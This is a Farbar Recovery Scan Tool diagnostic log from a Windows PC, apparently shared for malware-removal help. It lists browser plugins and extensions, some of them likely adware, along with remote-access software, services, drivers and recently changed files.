BHO: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll (RealDownloader)
BHO: No Name -> {626F3344-6A64-3995-E8E7-11D63F841162} ->  No File
BHO: No Name -> {6D5C04CD-A77C-BAB9-6494-57DA426BB009} ->  No File
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\Alwil Software\Avast5\aswWebRepIE.dll (AVAST Software)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Windows Live Messenger Companion Helper -> {9FDDE16B-836F-4806-AB1F-1455CBEFF289} -> C:\Program Files\Windows Live\Companion\companioncore.dll (Microsoft Corporation)
Winsock: Catalog5 05 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1

FireFox:
========
FF ProfilePath: C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default
FF Homepage: hxxp://www.google.com/
FF NetworkProxy: "type", 0
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_15_0_0_189.dll ()
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: @pandonetworks.com/PandoWebPlugin -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
FF Plugin: @real.com/nppl3260;version=16.0.0.282 -> C:\Program Files\Real\RealPlayer\Netscape6\nppl3260.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprndlchromebrowserrecordext;version=1.3.0 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprndlhtml5videoshim;version=1.3.0 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprndlpepperflashvideoshim;version=1.3.0 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprpplugin;version=16.0.0.282 -> C:\Program Files\Real\RealPlayer\Netscape6\nprpplugin.dll (RealPlayer)
FF Plugin: @realnetworks.com/npdlplugin;version=1 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll (RealDownloader)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll (Adobe Systems)
FF Plugin HKCU: @talk.google.com/GoogleTalkPlugin -> C:\Users\Nick\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin HKCU: @talk.google.com/O1DPlugin -> C:\Users\Nick\AppData\Roaming\Mozilla\plugins\npo1d.dll (Google)
FF Plugin HKCU: @tools.google.com/Google Update;version=3 -> C:\Users\Nick\AppData\Local\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: @tools.google.com/Google Update;version=9 -> C:\Users\Nick\AppData\Local\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: pandonetworks.com/PandoWebPlugin -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll (Pando Networks)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\np-mswmp.dll (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppl3260.dll (RealNetworks, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin2.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin3.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin4.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin5.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin6.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nprpplugin.dll (RealPlayer)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npwachk.dll (Nullsoft, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Nick\AppData\Roaming\mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\Nick\AppData\Roaming\mozilla\plugins\npo1d.dll (Google)
FF SearchPlugin: C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\searchplugins\bing-zugo.xml
FF Extension: ShoppperMuasteer - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\3-fduoyo@oa-qq.net [2014-10-28]
FF Extension: LogMeIn, Inc. Remote Access Plugin - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\LogMeInClient@logmein.com [2014-10-28]
FF Extension: SalesCeheccker - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\TkUtuf@Yi.edu [2014-10-28]
FF Extension: PrriNcECoupoin - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\wafx3fnhg@yetfkran.org [2014-10-28]
FF Extension: unicoupons - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\yiacql3.qas@w-jgmcvalj.org [2014-10-28]
FF Extension: Microsoft .NET Framework Assistant - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\{20a82645-c095-46ed-80e3-08825760534b} [2010-12-16]
FF Extension: Reddit Enhancement Suite - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\jid1-xUfzOsOFlzSOXg@jetpack.xpi [2013-05-17]
FF Extension: FlashGot - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\{19503e42-ca3c-4c27-b1e2-9cdb2170ee34}.xpi [2011-03-22]
FF Extension: StumbleUpon - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\{AE93811A-5C9A-4d34-8462-F7B864FC4696}.xpi [2011-12-30]
FF Extension: Adblock Plus - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2011-03-27]
FF Extension: Tab Mix Plus - C:\Users\Nick\AppData\Roaming\Mozilla\Firefox\Profiles\ghs5oui9.default\Extensions\{dc572301-7619-498c-a57d-39143191b318}.xpi [2011-05-11]
FF Extension: Java Console - C:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA} [2014-10-14]
FF Extension: Java Console - C:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA} [2014-10-14]
FF Extension: Java Console - C:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0037-ABCDEFFEDCBA} [2014-10-14]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2010-11-21]
FF HKLM\...\Firefox\Extensions: [{34712C68-7391-4c47-94F3-8F88D49AD632}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: RealDownloader - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2013-01-17]
FF HKLM\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\Alwil Software\Avast5\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\Alwil Software\Avast5\WebRep\FF [2011-07-07]
FF Extension: No Name - wrc@avast.com [Not Found]

Chrome:
=======
CHR dev: Chrome dev build detected! <======= ATTENTION
CHR Profile: C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Pin It) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\aeocpmaimgdkdkkhnilgfoicilnefefh [2014-07-06]
CHR Extension: (FineDealSoft) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\amhpndolaaocmppnmpmiaidoijofeldg [2014-10-28]
CHR Extension: (Hot Virtual Keyboard Extension) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\bdejgojmfhngmomodldpdppfbhoajadl [2014-09-04]
CHR Extension: (YouTube) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-01-17]
CHR Extension: (Tetris Flash) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhhalmjbofkjcgefcaejjdicdddpkkk [2014-07-06]
CHR Extension: (Google Search) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-09-07]
CHR Extension: (Avast Online Security) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2014-10-28]
CHR Extension: (RealDownloader) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\idhngdhcfkoamngbedgpaokgjbnpdiji [2013-01-17]
CHR Extension: (Music Plus for Google Play Music) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\ipfnecmlncaiipncipkgijboddcdmego [2014-08-25]
CHR Extension: (Chrome In-App Payments service) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-07]
CHR Extension: (Pink My Facebook) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\okcdpfndmnjdijikpehblfeancekjcgo [2014-09-23]
CHR Extension: (Gmail) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-01-17]
CHR Extension: (A HREF) - C:\Users\Nick\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkanabbomegdcfhkfppalghjamfekegb [2014-10-13]
CHR Extension: (unicoupons) - C:\ProgramData\ojjplcdckkkbjolfbbogeibgibmedagh\ [2014-10-13]
CHR HKLM\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\Alwil Software\Avast5\WebRep\Chrome\aswWebRepChrome.crx [2014-10-26]
CHR HKLM\...\Chrome\Extension: [idhngdhcfkoamngbedgpaokgjbnpdiji] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Chrome\Ext\realdownloader.crx [2012-11-29]

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 avast! Antivirus; C:\Program Files\Alwil Software\Avast5\AvastSvc.exe [50344 2014-10-26] (AVAST Software)
R2 ca82e1a5; c:\Program Files\Optimizer Pro\OptProCrashSvc.dll [186496 2014-06-15] ()
S4 Futuremark SystemInfo Service; C:\Program Files\Futuremark\Futuremark SystemInfo\FMSISvc.exe [135584 2011-12-09] (Futuremark Corporation)
R2 Hamachi2Svc; C:\Program Files\LogMeIn Hamachi\hamachi-2.exe [1440080 2013-06-28] (LogMeIn Inc.)
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.0.285\McCHSvc.exe [234776 2012-09-05] (McAfee, Inc.)
S3 RealNetworks Downloader Resolver Service; C:\Program Files\RealNetworks\RealDownloader\rndlresolversvc.exe [38608 2012-11-29] ()
S3 SwitchBoard; C:\Program Files\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
R2 uvnc_service; C:\Program Files\uvnc bvba\UltraVNC\WinVNC.exe [1795864 2014-10-01] (UltraVNC)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [24184 2014-10-26] ()
R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [70384 2014-10-31] (AVAST Software)
R1 aswRdr; C:\Windows\system32\drivers\aswRdr.sys [55240 2014-10-26] (AVAST Software)
R0 aswRvrt; C:\Windows\system32\Drivers\aswRvrt.sys [49944 2014-10-26] ()
R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [787800 2014-10-31] (AVAST Software)
R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [422760 2014-10-26] (AVAST Software)
R1 aswTdi; C:\Windows\system32\drivers\aswTdi.sys [57928 2014-10-26] (AVAST Software)
R0 aswVmm; C:\Windows\system32\Drivers\aswVmm.sys [206248 2014-10-26] ()
R1 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [242240 2012-10-05] (DT Soft Ltd)
R3 hamachi; C:\Windows\System32\DRIVERS\hamachi.sys [26176 2009-03-18] (LogMeIn, Inc.)
R1 SCDEmu; C:\Windows\system32\Drivers\SCDEmu.sys [59388 2009-11-08] (PowerISO Computing, Inc.) [File not signed]
S3 zghsdiag; C:\Windows\System32\DRIVERS\zghsdiag.sys [106752 2011-05-26] (ZTE Incorporated)
S3 zghsmdm; C:\Windows\System32\DRIVERS\zghsmdm.sys [106752 2011-05-26] (ZTE Incorporated)
S3 zghsnmea; C:\Windows\System32\DRIVERS\zghsnmea.sys [106752 2011-05-26] (ZTE Incorporated)
S4 blbdrive; \SystemRoot\system32\drivers\blbdrive.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 lmimirr; system32\DRIVERS\lmimirr.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
S3 radpms; system32\DRIVERS\radpms.sys [X]

==================== NetSvcs (Whitelisted) ===================


(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-01 10:08 - 2014-11-01 10:08 - 00024453 _____ () C:\Users\Nick\Desktop\FRST.txt
2014-11-01 10:07 - 2014-11-01 10:08 - 00000000 ____D () C:\FRST
2014-11-01 10:07 - 2014-11-01 10:07 - 01105920 _____ (Farbar) C:\Users\Nick\Desktop\FRST.exe
2014-11-01 09:52 - 2014-11-01 09:52 - 00854448 _____ () C:\Users\Nick\Desktop\SecurityCheck.exe
2014-10-28 12:23 - 2014-10-28 12:23 - 00000000 ____D () C:\Users\Nick\AppData\Roaming\UltraVNC
2014-10-28 12:14 - 2014-10-28 12:23 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\UltraVNC
2014-10-28 12:14 - 2014-10-28 12:14 - 00000000 ____D () C:\Program Files\uvnc bvba
2014-10-26 21:28 - 2014-10-26 21:28 - 00291352 _____ (AVAST Software) C:\Windows\system32\aswBoot.exe
2014-10-26 21:28 - 2014-10-26 21:28 - 00043152 _____ (AVAST Software) C:\Windows\avastSS.scr
2014-10-26 21:28 - 2014-10-26 21:28 - 00001842 _____ () C:\Users\Public\Desktop\Avast Free Antivirus.lnk
2014-10-26 21:18 - 2014-10-26 21:23 - 00004245 _____ () C:\Windows\system32\jupdate-1.7.0_71-b14.log
2014-10-26 20:55 - 2014-10-26 20:55 - 00000000 ____D () C:\Users\Hannah\AppData\Local\{C904B1C1-3E1E-4488-AF25-7A18B11AC300}
2014-10-26 19:59 - 2014-10-26 19:59 - 00114904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-26 19:56 - 2014-10-26 19:56 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\McAfee Security Scan Plus
2014-10-26 19:56 - 2014-10-26 19:56 - 00000000 ____D () C:\ProgramData\McAfee Security Scan
2014-10-26 19:56 - 2014-10-26 19:56 - 00000000 ____D () C:\Program Files\McAfee Security Scan
2014-10-26 18:22 - 2014-10-26 18:26 - 00000859 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-26 18:22 - 2014-10-26 18:22 - 00000000 ____D () C:\Users\Dylan\AppData\Roaming\Malwarebytes
2014-10-22 18:44 - 2014-10-22 18:45 - 00000000 ____D () C:\Users\Hannah\AppData\Local\{65D13997-5F32-456F-9964-9BB07D32E768}
2014-10-21 03:17 - 2014-06-15 15:18 - 01131664 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-21 03:17 - 2014-06-13 11:22 - 00156824 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-21 03:17 - 2014-06-13 11:22 - 00081560 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 03637248 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00834048 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00671744 _____ (Microsoft Corporation) C:\Windows\system32\mstime.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00498688 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00480768 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00380928 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00273408 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00193024 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00180736 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00106496 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2014-10-21 03:16 - 2014-09-23 16:37 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-21 03:16 - 2014-09-23 16:36 - 00347136 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-21 03:16 - 2014-09-23 16:36 - 00214528 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-21 03:16 - 2014-09-23 16:36 - 00019968 _____ (Microsoft Corporation) C:\Windows\system32\corpol.dll
2014-10-21 03:16 - 2014-09-23 15:27 - 01383424 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-21 03:15 - 2014-09-23 16:37 - 06119936 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-21 03:15 - 2014-09-23 16:37 - 01827328 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-21 03:15 - 2014-09-23 16:37 - 01177600 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-21 03:15 - 2014-09-23 11:05 - 00389632 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2014-10-21 03:13 - 2014-09-27 16:29 - 02054656 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-21 03:03 - 2014-09-04 16:27 - 00143360 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fastfat.sys
2014-10-21 03:00 - 2014-09-16 09:56 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-14 21:53 - 2014-10-14 21:53 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-10-13 17:53 - 2014-10-26 19:49 - 00000000 ____D () C:\ProgramData\SaalesCheckEr
2014-10-09 08:47 - 2014-10-09 08:47 - 00155248 _____ () C:\Windows\Minidump\Mini100914-01.dmp
2014-10-09 08:22 - 2014-10-09 08:22 - 00000000 ____D () C:\Users\Hannah\AppData\Local\{69E0C68D-60C0-41AE-8CBC-FD37C8FBD37E}

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-01 10:06 - 2012-04-03 11:24 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-11-01 10:05 - 2010-11-20 21:01 - 00000420 ____H () C:\Windows\Tasks\User_Feed_Synchronization-{F9D43FD3-5681-4AEF-A862-17FF1653F989}.job
2014-11-01 10:01 - 2006-11-02 05:46 - 00004048 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-01 10:01 - 2006-11-02 05:46 - 00004048 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-01 09:59 - 2006-11-02 05:35 - 00000000 ____D () C:\Windows\system32\FxsTmp
2014-11-01 09:50 - 2010-11-20 20:35 - 00000878 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-11-01 09:33 - 2010-11-20 20:35 - 00000882 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-11-01 09:16 - 2013-04-10 14:22 - 00000904 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2927482541-673307907-4085399872-1003UA.job
2014-11-01 08:52 - 2012-04-18 16:44 - 01626309 _____ () C:\Windows\WindowsUpdate.log
2014-11-01 08:16 - 2013-04-10 14:22 - 00000852 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2927482541-673307907-4085399872-1003Core.job
2014-11-01 04:37 - 2010-11-25 21:52 - 00000416 ____H () C:\Windows\Tasks\User_Feed_Synchronization-{C479CE1A-76B9-4D6F-8D71-575C334B2024}.job
2014-10-31 21:28 - 2011-07-07 12:05 - 00787800 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsnx.sys
2014-10-31 21:28 - 2010-11-20 20:35 - 00070384 _____ (AVAST Software) C:\Windows\system32\Drivers\aswmonflt.sys
2014-10-28 17:14 - 2014-07-06 19:10 - 00000000 ____D () C:\ProgramData\65214779c8ff1a47
2014-10-28 17:02 - 2014-08-19 06:10 - 00000000 ____D () C:\Users\Bill\AppData\Roaming\DropboxMaster
2014-10-28 17:02 - 2011-08-22 17:24 - 00000000 ____D () C:\Users\Bill\AppData\Roaming\Dropbox
2014-10-28 12:27 - 2006-11-02 06:00 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-28 12:26 - 2006-11-02 06:00 - 00032556 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-10-28 12:06 - 2013-10-19 11:31 - 00004923 _____ () C:\Windows\setupact.log
2014-10-28 06:35 - 2010-11-21 10:12 - 00229000 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-10-26 21:54 - 2011-05-04 21:14 - 00000000 ____D () C:\Users\Hannah\AppData\Roaming\uTorrent
2014-10-26 21:53 - 2013-04-14 19:04 - 00000000 ____D () C:\Users\Hannah\Tracing
2014-10-26 21:53 - 2010-11-22 19:19 - 00000000 ____D () C:\Users\Hannah\AppData\Local\LogMeIn Hamachi
2014-10-26 21:52 - 2014-06-03 19:50 - 00000000 ____D () C:\Users\Hannah\AppData\Local\Backup Assistant Plus
2014-10-26 21:30 - 2013-10-20 11:02 - 00806672 _____ () C:\Windows\PFRO.log
2014-10-26 21:28 - 2014-08-01 11:54 - 00024184 _____ () C:\Windows\system32\Drivers\aswHwid.sys
2014-10-26 21:28 - 2013-09-07 17:22 - 00206248 _____ () C:\Windows\system32\Drivers\aswVmm.sys
2014-10-26 21:28 - 2013-09-07 17:22 - 00049944 _____ () C:\Windows\system32\Drivers\aswRvrt.sys
2014-10-26 21:28 - 2011-07-07 12:05 - 00787800 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsnx.sys.1414816134123
2014-10-26 21:28 - 2010-11-20 20:35 - 00422760 _____ (AVAST Software) C:\Windows\system32\Drivers\aswsp.sys
2014-10-26 21:28 - 2010-11-20 20:35 - 00070384 _____ (AVAST Software) C:\Windows\system32\Drivers\aswmonflt.sys.1414816134123
2014-10-26 21:28 - 2010-11-20 20:35 - 00057928 _____ (AVAST Software) C:\Windows\system32\Drivers\aswTdi.sys
2014-10-26 21:28 - 2010-11-20 20:35 - 00055240 _____ (AVAST Software) C:\Windows\system32\Drivers\aswRdr.sys
2014-10-26 21:23 - 2010-12-06 17:58 - 00000000 ____D () C:\Program Files\Java
2014-10-26 21:02 - 2012-12-16 23:41 - 00000680 _____ () C:\Users\Dylan\AppData\Local\d3d9caps.dat
2014-10-26 19:57 - 2012-12-14 01:04 - 00000000 ____D () C:\Users\Dylan\AppData\Local\Adobe
2014-10-26 19:56 - 2012-04-03 11:24 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2014-10-26 19:56 - 2011-08-21 09:55 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2014-10-26 19:52 - 2014-06-15 19:46 - 00000000 ____D () C:\Program Files\Optimizer Pro
2014-10-26 19:52 - 2012-10-20 19:44 - 00000000 ____D () C:\Windows\WinBrick.96
2014-10-26 19:49 - 2014-09-23 18:42 - 00000000 ____D () C:\ProgramData\SaLesChheckueR
2014-10-26 19:49 - 2014-09-04 23:21 - 00000000 ____D () C:\ProgramData\FlaashCoupon
2014-10-26 18:26 - 2014-08-31 11:57 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-26 18:26 - 2014-08-31 11:57 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-10-21 03:52 - 2006-11-02 04:18 - 00000000 ____D () C:\Windows\Microsoft.NET
2014-10-21 03:38 - 2006-11-02 05:46 - 03688432 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-21 03:37 - 2012-04-27 19:39 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service
2014-10-21 03:12 - 2013-08-20 03:09 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-21 03:03 - 2006-11-02 03:24 - 100290944 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe
2014-10-09 09:07 - 2006-11-02 04:18 - 00000000 ____D () C:\Windows\rescache
2014-10-09 09:06 - 2014-09-28 16:10 - 00000000 ____D () C:\Users\Hannah\Desktop\Nick
2014-10-09 09:01 - 2010-12-25 11:51 - 00008192 _____ () C:\Users\Hannah\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2014-10-09 08:47 - 2011-01-14 21:43 - 00000000 ____D () C:\Windows\Minidump
2014-10-09 08:46 - 2013-12-12 09:39 - 274563712 _____ () C:\Windows\MEMORY.DMP

Files to move or delete:
====================
C:\Users\Nick\random.dat
C:\Users\Public\replace.bat


Some content of TEMP:
====================
C:\Users\Bill\AppData\Local\Temp\contentDATs.exe
C:\Users\Bill\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpvj9mxx.dll
C:\Users\Bill\AppData\Local\Temp\jre-6u23-windows-i586-iftw-rv.exe
C:\Users\Bill\AppData\Local\Temp\jre-6u26-windows-i586-iftw-rv.exe
C:\Users\Bill\AppData\Local\Temp\jre-6u33-windows-i586-iftw.exe
C:\Users\Bill\AppData\Local\Temp\jre-7u17-windows-i586-iftw.exe
C:\Users\Bill\AppData\Local\Temp\jre-7u21-windows-i586-iftw.exe
C:\Users\Bill\AppData\Local\Temp\SecurityScan_Release.exe
C:\Users\Dylan\AppData\Local\Temp\jre-7u25-windows-i586-iftw.exe
